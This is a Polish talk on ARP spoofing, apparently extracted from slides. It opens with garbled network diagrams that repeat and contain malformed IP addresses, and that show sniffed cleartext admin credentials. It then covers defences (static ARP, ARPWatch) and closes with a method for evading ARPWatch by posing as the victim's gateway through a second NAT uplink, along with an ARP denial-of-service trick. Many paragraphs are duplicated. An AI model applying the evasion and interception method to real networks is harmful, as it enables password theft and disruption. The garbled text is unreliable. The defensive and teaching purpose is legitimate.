2171354423 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 IP: 21713544254/24 MAC: 00:C0:4F:17:B3:F8 IP: 2171354464/24 MAC: 2171354423 at 00:50:DA:3B:F8:86 21713544254 at 00:C0:4F:17:B3:F8 Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : 2179721610 IpSrc : 2171354423 Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 21713544254 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 MAC: 00:50:DA:3B:F8:86

2171354423 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 IP: 21713544254/24 MAC: 00:C0:4F:17:B3:F8 IP: 2171354464/24 MAC: 2171354423 at 00:50:DA:3B:F8:86 21713544254 at 00:C0:4F:17:B3:F8 Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : 2179721610 IpSrc : 2171354423 Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 21713544254 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0

2171354423 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 IP: 21713544254/24 Src : 00:50:DA:3B:F8:86 MAC: 00:C0:4F:17:B3:F8Dst : 00:C0:4F:17:B3:F8 IpDest : 2179721610 IpSrc : 2171354423 Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka IP: 2171354464/24 MAC: 2171354423 at 00:50:DA:3B:F8:86 21713544254 at 00:C0:4F:17:B3:F8 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 21713544254 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 MAC: 00:50:DA:3B:F8:86

Nietrudno zauważyć, że w tej technice stajemy się po prostu punktem pośrednim między bramą a komputerem ofiary Nie wszystko jednak jest takie piękne, bo przecież Pan Bartłomiej Solarz jakoś się zorientował i wszedł na RSO z pytaniem Kto ma laptopa Dell a ;-) Po pierwsze zdradza nas fakt, że tablica ARP na bramie posiadała 2 adresy IP powiązane z tym samym MAC iem Po drugie brama dostała odpowiedź ARP nie zadając pytania Jak to powiedział Pan Solarz : w normalnej sieci to by przeszło Zastanówmy się skąd dobry administrator wie, że ktoś spoof uje, czyli innymi słowy, jak się przed tym zabezpieczyć?

Metoda 1 Siedzimy i gapimy się na tablice ARP na bramie Jeśli ktoś spoof uje to pojawią się 2 adresy IP powiązane z tym samym adresem MAC Albo tcpdump i eth0 ARP i patrzymy czy dostajemy odpowiedź ARP nie zadawszy pytania Osobiście jednak nie polecam tej techniki, z oczywistych względów ;-)

Metoda 1 Siedzimy i gapimy się na tablice ARP na bramie Jeśli ktoś spoof uje to pojawią się 2 adresy IP powiązane z tym samym adresem MAC Albo tcpdump i eth0 ARP i patrzymy czy dostajemy odpowiedź ARP nie zadawszy pytania Osobiście jednak nie polecam tej techniki, z oczywistych względów ;-) Metoda 2 Statyczne tablice ARP Czyli tworzymy na stałe pary IP-MAC Ok, ale co jeśli mamy 253 hosty do powiązania, na każdej maszynie! Czyli 253 razy robimy 253 wpisy A co jeśli nam jakaś karta sieciowa padnie? 253 razy zmieniamy tablice ARP + dodajemy 253 wpisów na komputerze z nową kartą sieciową ;-) Nie polecam!

Metoda 3 ARPWatch narzędzie monitorujące protokół ARP ARPWatch kontroluje tablice ARP hosta na którym działa, jak i obserwuje przychodzące odpowiedzi ARP ARPWatch nie blokuje, tylko wykrywa i informuje o tym, że może mieć miejsce spoofing Tak właśnie Pan Solarz mnie namierzył (przyznał się ;-) )

Metoda 3 ARPWatch narzędzie monitorujące protokół ARP ARPWatch kontroluje tablice ARP hosta na którym działa, jak i obserwuje przychodzące odpowiedzi ARP ARPWatch nie blokuje, tylko wykrywa i informuje o tym, że może mieć miejsce spoofing Tak właśnie Pan Solarz mnie namierzył (przyznał się ;-) ) Zapewne istnieją jeszcze inne metody obrony przed tego typu atakami, ja jednak nie spotkałem się z innymi technikami, zainteresowanych odsyłam do sieci

Jest jednak sposób obejścia ARPWatch a ;-) Jestem pewny, że nie odkryłem ameryki i ktoś, gdzieś wpadł już na to Ja jednak doszedłem do tego sam, wytestowałem na biurku i działa

Jest jednak sposób obejścia ARPWatch a ;-) Jestem pewny, że nie odkryłem ameryki i ktoś, gdzieś wpadł już na to Ja jednak doszedłem do tego sam, wytestowałem na biurku i działa Do rzeczy! Skoro brama śledzi protokół ARP, to czy można obejść bramę?

Jest jednak sposób obejścia ARPWatch a ;-) Jestem pewny, że nie odkryłem ameryki i ktoś, gdzieś wpadł już na to Ja jednak doszedłem do tego sam, wytestowałem na biurku i działa Do rzeczy! Skoro brama śledzi protokół ARP, to czy można obejść bramę? Można, ale jak?

Jest jednak sposób obejścia ARPWatch a ;-) Jestem pewny, że nie odkryłem ameryki i ktoś, gdzieś wpadł już na to Ja jednak doszedłem do tego sam, wytestowałem na biurku i działa Do rzeczy! Skoro brama śledzi protokół ARP, to czy można obejść bramę? Można, ale jak? Ok, pytanie : Czego host ofiary oczekuje od bramy?

Jest jednak sposób obejścia ARPWatch a ;-) Jestem pewny, że nie odkryłem ameryki i ktoś, gdzieś wpadł już na to Ja jednak doszedłem do tego sam, wytestowałem na biurku i działa Do rzeczy! Skoro brama śledzi protokół ARP, to czy można obejść bramę? Można, ale jak? Ok, pytanie : Czego host ofiary oczekuje od bramy? Routingu, dajmy mu więc ten routing innymi słowy stańmy się bramą Wówczas zatruć musimy tylko hosta ofiary (na którym nie ma ARPWatch a, a nawet jak jest to nie poinformuje o tym admina tylko nas ;-) )

Jest jednak małe ale Potrzebujemy drugiego łącza (z wyjściem na świat np jakieś po dial-up ie albo UMTS), żeby podnieść interfejs i zrobić NAT a Wówczas ofiara wyśle pakiety do nas My mu je zsnatujemy (mamy ruch wychodzący - hasła) Odpowiedź z serwera przyjdzie na adres naszego interfejsu NAT ujacego i trafi z powrotem do hosta ofiary (mamy ruch przychodzący) Jesteśmy po środku jesteśmy zbieramy ruch zbieramy, a więc Man In The Middle nie inaczej ;-) Podobnie można zrobić DoS a wysyłamy do hosta ofiary fałszywą odpowiedź ARP mówiącą, że brama jest na adresie MAC i tutaj wstawiamy wymyślony MAC Host ofiary będzie starał się komunikować z bramą tworząc ramki z nieprawidłowym polem adres docelowy Komunikacja nie nastąpi czyli DoS, nie ma Internetu ;-)

Z tej samej serii mogę przygotować: Sniffowanie w sieciach bezprzewodowych - WEP cracking - WPA dictionary attack

Dziękuję za uwagę, mam nadzieję że się podobało